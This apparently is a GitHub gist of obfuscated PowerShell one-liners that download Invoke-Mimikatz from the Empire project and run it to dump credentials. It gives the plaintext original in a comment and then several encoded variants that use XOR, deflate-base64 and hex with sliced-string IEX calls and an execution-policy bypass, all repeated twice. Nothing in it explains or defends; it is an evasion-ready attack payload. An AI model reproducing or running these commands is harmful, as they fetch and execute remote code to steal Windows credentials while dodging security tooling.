bobby-tablez/Obfuscated Invoke Mimikatz

## Obfuscated Invoke Mimikatz
# Use at your own risk!
#
# ORIGINAL:
# IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#

 [STrING]::joIn('' , ( [cHar[]]( 18, 30 ,3 , 123 , 115, 21 ,62 , 44 , 118,20 , 57,49 ,62, 56 , 47 , 123 ,21,62, 47 , 117 , 12, 62, 57,24,55 ,50,62, 53 , 47 ,114,117, 31,52 ,44, 53, 55,52, 58, 63, 8 ,47 ,41 , 50, 53, 60, 115 , 121 , 51 , 47 , 47 ,43 , 40 ,97,116, 116, 41, 58 ,44, 117 ,60 , 50 , 47 ,51 , 46 ,57,46 ,40, 62 ,41 , 56, 52 , 53,47 ,62, 53, 47, 117,56, 52,54 , 116 , 25,24 ,118 ,8,30,24 , 14 , 9 ,18 ,15 ,2, 116,30, 54 ,43 , 50 ,41, 62 ,116 ,54, 58 , 40 , 47 , 62 ,41, 116, 62 , 54, 43 , 50 , 41 , 62, 116 ,40 , 62, 41, 45, 62,41 , 116 ,63 ,58,47 ,58 ,116,54,52 , 63 , 46,55,62, 4 , 40 , 52 , 46, 41 , 56,62 ,116,56,41 , 62 ,63 , 62,53 , 47 ,50, 58,55 , 40, 116 ,18 , 53 ,45 , 52, 48 ,62 ,118,22 ,50, 54, 50 , 48 ,58, 47,33,117,43 ,40, 106 , 121, 114 ,96,123,18, 53 ,45 ,52 , 48, 62, 118,22 ,50 ,54 , 50,48 ,58, 47 ,33,123,118 ,24, 52, 54 , 54, 58,53,63,123 ,43,41,50 , 45,50 , 55,62 ,60 ,62 , 97,97 ,63 , 62 , 57, 46 ,60 ,96 , 123, 18,53 , 45 ,52 ,48 , 62 ,118 , 22,50,54,50, 48 , 58 , 47 ,33 , 123,118 , 31 ,46,54 , 43 , 24 , 41,62,63,40,96) | FOreAch-OBjEct{ [cHar] ($_-bxOR '0x5B') }) ) |& ( $enV:cOMsPeC[4,26,25]-joIn'')

. ( $Pshome[21]+$PsHOMe[30]+'x')( NeW-ObJECt sySTEM.io.cOMpReSsiON.DEFlATEStrEam( [systEM.Io.MemorystrEam] [sYsTEM.cONvERt]::fRoMBase64StRinG('RVTLjhMxEPyVPqyYRHIk29P2eHJjEY89QBAgLtFotUSR0B4WKXBYCfh3qqs94TAP97Oqumfk+PnL5e7D22W/f/xx97QZBgmykePp3cPluCwbSS3IGCWMsKfMeypBcpJQM06qNLWQESRlCjqbB6/VvNOalhOtbkhuDsLAKWQNpUgo0TPHnpmS4poAIIWCZqrmxFVwxAPQKo4NHkRrMgDRQ2okULahPa1oGMoOADxPaFAtFDdNVtPbEGIlpdiTvARYGUk8NBr+tS/yDaI1t2DnYYmsFdwfiqtl0uQC2sYRHVsYI0+S7AYFzWrws2MbjZZ24IbIsFpz1irqwEnJWTqwToyDsqBruhB0zR0M8zgepGjhOyPorciC1tSgsaV1JNtKIXEuPt0VA51aex+Q71hNh97a61qn67w5vMZVEI29uynBldDCwnA16fWwdbmn6UqsEawJP47cHiPNarH6OlhhIJ1rwGYGW/C1vMNuqzJrefG5oc//6sLylm8Aszo0j1OnMYJh4PLraMNwfMWfVMxXjOPBJs7TVRP/lLhtFjE7cuxTal2ujtYA9UWwt5xNDZtOdCn6XhBur+GRI6Zgg+PIzMX1U36lgA3B5rqVP/LmcDm/PH3fHW4fX59+/fY/wyKbm/vdt+fDJxnic7kdtvJ3Kwh/gX/Hzfnp6/50eP/z4/nVUUOuIZdlZ3+XYdj+Aw==' ),[IO.CoMpReSSion.coMPREsSIoNmOde]::dEcOmpResS) |% { NeW-ObJECt system.Io.sTReaMreadER( $_ , [Text.EnCoDing]::ASCIi )}).ReAdtoeNd( )

 &.((RVpa "\???????\*2\*POO*\*river?\?6*").PATh[4,15,34]-JOin'')( NEW-ObjECT IO.COmprEssiOn.dEflatEStreAm([SYSTem.iO.MEMoRyStReAM] [SysTeM.COnVErt]::frOmbAsE64StRing( 'RVTLjhMxEPyVPqyYRHIk29P2eHJjEY89QBAgLtFotUSR0B4WKXBYCfh3qqs94TAP97Oqumfk+PnL5e7D22W/f/xx97QZBgmykePp3cPluCwbSS3IGCWMsKfMeypBcpJQM06qNLWQESRlCjqbB6/VvNOalhOtbkhuDsLAKWQNpUgo0TPHnpmS4poAIIWCZqrmxFVwxAPQKo4NHkRrMgDRQ2okULahPa1oGMoOADxPaFAtFDdNVtPbEGIlpdiTvARYGUk8NBr+tS/yDaI1t2DnYYmsFdwfiqtl0uQC2sYRHVsYI0+S7AYFzWrws2MbjZZ24IbIsFpz1irqwEnJWTqwToyDsqBruhB0zR0M8zgepGjhOyPorciC1tSgsaV1JNtKIXEuPt0VA51aex+Q71hNh97a61qn67w5vMZVEI29uynBldDCwnA16fWwdbmn6UqsEawJP47cHiPNarH6OlhhIJ1rwGYGW/C1vMNuqzJrefG5oc//6sLylm8Aszo0j1OnMYJh4PLraMNwfMWfVMxXjOPBJs7TVRP/lLhtFjE7cuxTal2ujtYA9UWwt5xNDZtOdCn6XhBur+GRI6Zgg+PIzMX1U36lgA3B5rqVP/LmcDm/PH3fHW4fX59+/fY/wyKbm/vdt+fDJxnic7kdtvJ3Kwh/gX/Hzfnp6/50eP/z4/nVUUOuIZdlZ3+XYdj+Aw==' ), [io.cOMpResSioN.CompRESsIOnmOdE]::dEcompRess ) |FOReacH { NEW-ObjECT  iO.stREaMrEaDeR( $_ ,[sYStEM.TEXT.encODING]::aScIi)} ).reaDToENd( )

 powErSHELl -NOnInteRa  -nolOGo -Ep bypass -noproF -cOM  "  .(gal ?e[?x])( NEW-ObjECT IO.COmprEssiOn.dEflatEStreAm([SYSTem.iO.MEMoRyStReAM] [SysTeM.COnVErt]::frOmbAsE64StRing( 'RVTLjhMxEPyVPqyYRHIk29P2eHJjEY89QBAgLtFotUSR0B4WKXBYCfh3qqs94TAP97Oqumfk+PnL5e7D22W/f/xx97QZBgmykePp3cPluCwbSS3IGCWMsKfMeypBcpJQM06qNLWQESRlCjqbB6/VvNOalhOtbkhuDsLAKWQNpUgo0TPHnpmS4poAIIWCZqrmxFVwxAPQKo4NHkRrMgDRQ2okULahPa1oGMoOADxPaFAtFDdNVtPbEGIlpdiTvARYGUk8NBr+tS/yDaI1t2DnYYmsFdwfiqtl0uQC2sYRHVsYI0+S7AYFzWrws2MbjZZ24IbIsFpz1irqwEnJWTqwToyDsqBruhB0zR0M8zgepGjhOyPorciC1tSgsaV1JNtKIXEuPt0VA51aex+Q71hNh97a61qn67w5vMZVEI29uynBldDCwnA16fWwdbmn6UqsEawJP47cHiPNarH6OlhhIJ1rwGYGW/C1vMNuqzJrefG5oc//6sLylm8Aszo0j1OnMYJh4PLraMNwfMWfVMxXjOPBJs7TVRP/lLhtFjE7cuxTal2ujtYA9UWwt5xNDZtOdCn6XhBur+GRI6Zgg+PIzMX1U36lgA3B5rqVP/LmcDm/PH3fHW4fX59+/fY/wyKbm/vdt+fDJxnic7kdtvJ3Kwh/gX/Hzfnp6/50eP/z4/nVUUOuIZdlZ3+XYdj+Aw==' ), [io.cOMpResSioN.CompRESsIOnmOdE]::dEcompRess ) |FOReacH { NEW-ObjECT  iO.stREaMrEaDeR( $_ ,[sYStEM.TEXT.encODING]::aScIi)} ).reaDToENd( ) "

  [StRing]::joIn('' , ((49 , 45, 58, 20, 28,'4e' ,65,77 ,'2d', '4f',62 , '6a',65,63 , 74, 20 , '4e' ,65 , 74 ,'2e' , 57 , 65, 62, 43,'6c' ,69 , 65 , '6e',74 ,29, '2e' ,44 , '6f', 77,'6e' , '6c','6f',61,64, 53 ,74, 72 ,69 ,'6e' , 67,28 , 22, 68 ,74 ,74,70,73,'3a' ,'2f' ,'2f', 72 , 61,77, '2e' ,67,69 ,74 , 68,75, 62,75 ,73, 65 , 72 ,63, '6f' , '6e' ,74 ,65, '6e' , 74 ,'2e' , 63,'6f' , '6d','2f' , 42,43 , '2d' , 53,45 , 43, 55 ,52 ,49 , 54, 59 ,'2f' ,45,'6d',70,69, 72, 65 , '2f' ,'6d' ,61 ,73 ,74, 65 , 72,'2f', 65 ,'6d',70,69 , 72,65,'2f' , 73 ,65 , 72, 76 ,65 ,72, '2f',64,61 ,74 ,61,'2f','6d' , '6f', 64,75, '6c',65 ,'5f' ,73 , '6f' , 75 ,72, 63 , 65 ,'2f',63, 72 , 65, 64,65, '6e',74, 69 ,61, '6c', 73, '2f', 49 , '6e',76,'6f' ,'6b' ,65 ,'2d','4d', 69,'6d', 69 ,'6b',61 , 74 ,'7a' , '2e',70,73 , 31,22 ,29 , '3b',20 ,49 , '6e', 76 , '6f', '6b', 65 , '2d', '4d', 69,'6d', 69,'6b' ,61 ,74 ,'7a' ,20 , '2d' , 43, '6f', '6d', '6d' ,61 , '6e' , 64 ,20 ,70 , 72 ,69,76 ,69 , '6c', 65 ,67 , 65,'3a' ,'3a' ,64, 65, 62 , 75,67, '3b', 20,49,'6e',76 ,'6f' , '6b' ,65 , '2d' ,'4d' , 69 ,'6d' , 69, '6b' ,61,74,'7a' ,20, '2d' ,44 ,75, '6d',70,43, 72,65 , 64 ,73 , '3b')|% { ([ChaR]( [cONVeRT]::TOInT16( ([STRing]$_),16))) } ) )| .( $shEllID[1]+$ShelLId[13]+'x')
	# Use at your own risk!
	#
	# ORIGINAL:
	# IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
	#

	[STrING]::joIn('' , ( [cHar[]]( 18, 30 ,3 , 123 , 115, 21 ,62 , 44 , 118,20 , 57,49 ,62, 56 , 47 , 123 ,21,62, 47 , 117 , 12, 62, 57,24,55 ,50,62, 53 , 47 ,114,117, 31,52 ,44, 53, 55,52, 58, 63, 8 ,47 ,41 , 50, 53, 60, 115 , 121 , 51 , 47 , 47 ,43 , 40 ,97,116, 116, 41, 58 ,44, 117 ,60 , 50 , 47 ,51 , 46 ,57,46 ,40, 62 ,41 , 56, 52 , 53,47 ,62, 53, 47, 117,56, 52,54 , 116 , 25,24 ,118 ,8,30,24 , 14 , 9 ,18 ,15 ,2, 116,30, 54 ,43 , 50 ,41, 62 ,116 ,54, 58 , 40 , 47 , 62 ,41, 116, 62 , 54, 43 , 50 , 41 , 62, 116 ,40 , 62, 41, 45, 62,41 , 116 ,63 ,58,47 ,58 ,116,54,52 , 63 , 46,55,62, 4 , 40 , 52 , 46, 41 , 56,62 ,116,56,41 , 62 ,63 , 62,53 , 47 ,50, 58,55 , 40, 116 ,18 , 53 ,45 , 52, 48 ,62 ,118,22 ,50, 54, 50 , 48 ,58, 47,33,117,43 ,40, 106 , 121, 114 ,96,123,18, 53 ,45 ,52 , 48, 62, 118,22 ,50 ,54 , 50,48 ,58, 47 ,33,123,118 ,24, 52, 54 , 54, 58,53,63,123 ,43,41,50 , 45,50 , 55,62 ,60 ,62 , 97,97 ,63 , 62 , 57, 46 ,60 ,96 , 123, 18,53 , 45 ,52 ,48 , 62 ,118 , 22,50,54,50, 48 , 58 , 47 ,33 , 123,118 , 31 ,46,54 , 43 , 24 , 41,62,63,40,96) \| FOreAch-OBjEct{ [cHar] ($_-bxOR '0x5B') }) ) \|& ( $enV:cOMsPeC[4,26,25]-joIn'')

	. ( $Pshome[21]+$PsHOMe[30]+'x')( NeW-ObJECt sySTEM.io.cOMpReSsiON.DEFlATEStrEam( [systEM.Io.MemorystrEam] [sYsTEM.cONvERt]::fRoMBase64StRinG('RVTLjhMxEPyVPqyYRHIk29P2eHJjEY89QBAgLtFotUSR0B4WKXBYCfh3qqs94TAP97Oqumfk+PnL5e7D22W/f/xx97QZBgmykePp3cPluCwbSS3IGCWMsKfMeypBcpJQM06qNLWQESRlCjqbB6/VvNOalhOtbkhuDsLAKWQNpUgo0TPHnpmS4poAIIWCZqrmxFVwxAPQKo4NHkRrMgDRQ2okULahPa1oGMoOADxPaFAtFDdNVtPbEGIlpdiTvARYGUk8NBr+tS/yDaI1t2DnYYmsFdwfiqtl0uQC2sYRHVsYI0+S7AYFzWrws2MbjZZ24IbIsFpz1irqwEnJWTqwToyDsqBruhB0zR0M8zgepGjhOyPorciC1tSgsaV1JNtKIXEuPt0VA51aex+Q71hNh97a61qn67w5vMZVEI29uynBldDCwnA16fWwdbmn6UqsEawJP47cHiPNarH6OlhhIJ1rwGYGW/C1vMNuqzJrefG5oc//6sLylm8Aszo0j1OnMYJh4PLraMNwfMWfVMxXjOPBJs7TVRP/lLhtFjE7cuxTal2ujtYA9UWwt5xNDZtOdCn6XhBur+GRI6Zgg+PIzMX1U36lgA3B5rqVP/LmcDm/PH3fHW4fX59+/fY/wyKbm/vdt+fDJxnic7kdtvJ3Kwh/gX/Hzfnp6/50eP/z4/nVUUOuIZdlZ3+XYdj+Aw==' ),[IO.CoMpReSSion.coMPREsSIoNmOde]::dEcOmpResS) \|% { NeW-ObJECt system.Io.sTReaMreadER( $_ , [Text.EnCoDing]::ASCIi )}).ReAdtoeNd( )

	&.((RVpa "\???????\2\POO\river?\?6*").PATh[4,15,34]-JOin'')( NEW-ObjECT IO.COmprEssiOn.dEflatEStreAm([SYSTem.iO.MEMoRyStReAM] [SysTeM.COnVErt]::frOmbAsE64StRing( 'RVTLjhMxEPyVPqyYRHIk29P2eHJjEY89QBAgLtFotUSR0B4WKXBYCfh3qqs94TAP97Oqumfk+PnL5e7D22W/f/xx97QZBgmykePp3cPluCwbSS3IGCWMsKfMeypBcpJQM06qNLWQESRlCjqbB6/VvNOalhOtbkhuDsLAKWQNpUgo0TPHnpmS4poAIIWCZqrmxFVwxAPQKo4NHkRrMgDRQ2okULahPa1oGMoOADxPaFAtFDdNVtPbEGIlpdiTvARYGUk8NBr+tS/yDaI1t2DnYYmsFdwfiqtl0uQC2sYRHVsYI0+S7AYFzWrws2MbjZZ24IbIsFpz1irqwEnJWTqwToyDsqBruhB0zR0M8zgepGjhOyPorciC1tSgsaV1JNtKIXEuPt0VA51aex+Q71hNh97a61qn67w5vMZVEI29uynBldDCwnA16fWwdbmn6UqsEawJP47cHiPNarH6OlhhIJ1rwGYGW/C1vMNuqzJrefG5oc//6sLylm8Aszo0j1OnMYJh4PLraMNwfMWfVMxXjOPBJs7TVRP/lLhtFjE7cuxTal2ujtYA9UWwt5xNDZtOdCn6XhBur+GRI6Zgg+PIzMX1U36lgA3B5rqVP/LmcDm/PH3fHW4fX59+/fY/wyKbm/vdt+fDJxnic7kdtvJ3Kwh/gX/Hzfnp6/50eP/z4/nVUUOuIZdlZ3+XYdj+Aw==' ), [io.cOMpResSioN.CompRESsIOnmOdE]::dEcompRess ) \|FOReacH { NEW-ObjECT iO.stREaMrEaDeR( $_ ,[sYStEM.TEXT.encODING]::aScIi)} ).reaDToENd( )

	powErSHELl -NOnInteRa -nolOGo -Ep bypass -noproF -cOM " .(gal ?e[?x])( NEW-ObjECT IO.COmprEssiOn.dEflatEStreAm([SYSTem.iO.MEMoRyStReAM] [SysTeM.COnVErt]::frOmbAsE64StRing( 'RVTLjhMxEPyVPqyYRHIk29P2eHJjEY89QBAgLtFotUSR0B4WKXBYCfh3qqs94TAP97Oqumfk+PnL5e7D22W/f/xx97QZBgmykePp3cPluCwbSS3IGCWMsKfMeypBcpJQM06qNLWQESRlCjqbB6/VvNOalhOtbkhuDsLAKWQNpUgo0TPHnpmS4poAIIWCZqrmxFVwxAPQKo4NHkRrMgDRQ2okULahPa1oGMoOADxPaFAtFDdNVtPbEGIlpdiTvARYGUk8NBr+tS/yDaI1t2DnYYmsFdwfiqtl0uQC2sYRHVsYI0+S7AYFzWrws2MbjZZ24IbIsFpz1irqwEnJWTqwToyDsqBruhB0zR0M8zgepGjhOyPorciC1tSgsaV1JNtKIXEuPt0VA51aex+Q71hNh97a61qn67w5vMZVEI29uynBldDCwnA16fWwdbmn6UqsEawJP47cHiPNarH6OlhhIJ1rwGYGW/C1vMNuqzJrefG5oc//6sLylm8Aszo0j1OnMYJh4PLraMNwfMWfVMxXjOPBJs7TVRP/lLhtFjE7cuxTal2ujtYA9UWwt5xNDZtOdCn6XhBur+GRI6Zgg+PIzMX1U36lgA3B5rqVP/LmcDm/PH3fHW4fX59+/fY/wyKbm/vdt+fDJxnic7kdtvJ3Kwh/gX/Hzfnp6/50eP/z4/nVUUOuIZdlZ3+XYdj+Aw==' ), [io.cOMpResSioN.CompRESsIOnmOdE]::dEcompRess ) \|FOReacH { NEW-ObjECT iO.stREaMrEaDeR( $_ ,[sYStEM.TEXT.encODING]::aScIi)} ).reaDToENd( ) "

	[StRing]::joIn('' , ((49 , 45, 58, 20, 28,'4e' ,65,77 ,'2d', '4f',62 , '6a',65,63 , 74, 20 , '4e' ,65 , 74 ,'2e' , 57 , 65, 62, 43,'6c' ,69 , 65 , '6e',74 ,29, '2e' ,44 , '6f', 77,'6e' , '6c','6f',61,64, 53 ,74, 72 ,69 ,'6e' , 67,28 , 22, 68 ,74 ,74,70,73,'3a' ,'2f' ,'2f', 72 , 61,77, '2e' ,67,69 ,74 , 68,75, 62,75 ,73, 65 , 72 ,63, '6f' , '6e' ,74 ,65, '6e' , 74 ,'2e' , 63,'6f' , '6d','2f' , 42,43 , '2d' , 53,45 , 43, 55 ,52 ,49 , 54, 59 ,'2f' ,45,'6d',70,69, 72, 65 , '2f' ,'6d' ,61 ,73 ,74, 65 , 72,'2f', 65 ,'6d',70,69 , 72,65,'2f' , 73 ,65 , 72, 76 ,65 ,72, '2f',64,61 ,74 ,61,'2f','6d' , '6f', 64,75, '6c',65 ,'5f' ,73 , '6f' , 75 ,72, 63 , 65 ,'2f',63, 72 , 65, 64,65, '6e',74, 69 ,61, '6c', 73, '2f', 49 , '6e',76,'6f' ,'6b' ,65 ,'2d','4d', 69,'6d', 69 ,'6b',61 , 74 ,'7a' , '2e',70,73 , 31,22 ,29 , '3b',20 ,49 , '6e', 76 , '6f', '6b', 65 , '2d', '4d', 69,'6d', 69,'6b' ,61 ,74 ,'7a' ,20 , '2d' , 43, '6f', '6d', '6d' ,61 , '6e' , 64 ,20 ,70 , 72 ,69,76 ,69 , '6c', 65 ,67 , 65,'3a' ,'3a' ,64, 65, 62 , 75,67, '3b', 20,49,'6e',76 ,'6f' , '6b' ,65 , '2d' ,'4d' , 69 ,'6d' , 69, '6b' ,61,74,'7a' ,20, '2d' ,44 ,75, '6d',70,43, 72,65 , 64 ,73 , '3b')\|% { ([ChaR]( [cONVeRT]::TOInT16( ([STRing]$_),16))) } ) )\| .( $shEllID[1]+$ShelLId[13]+'x')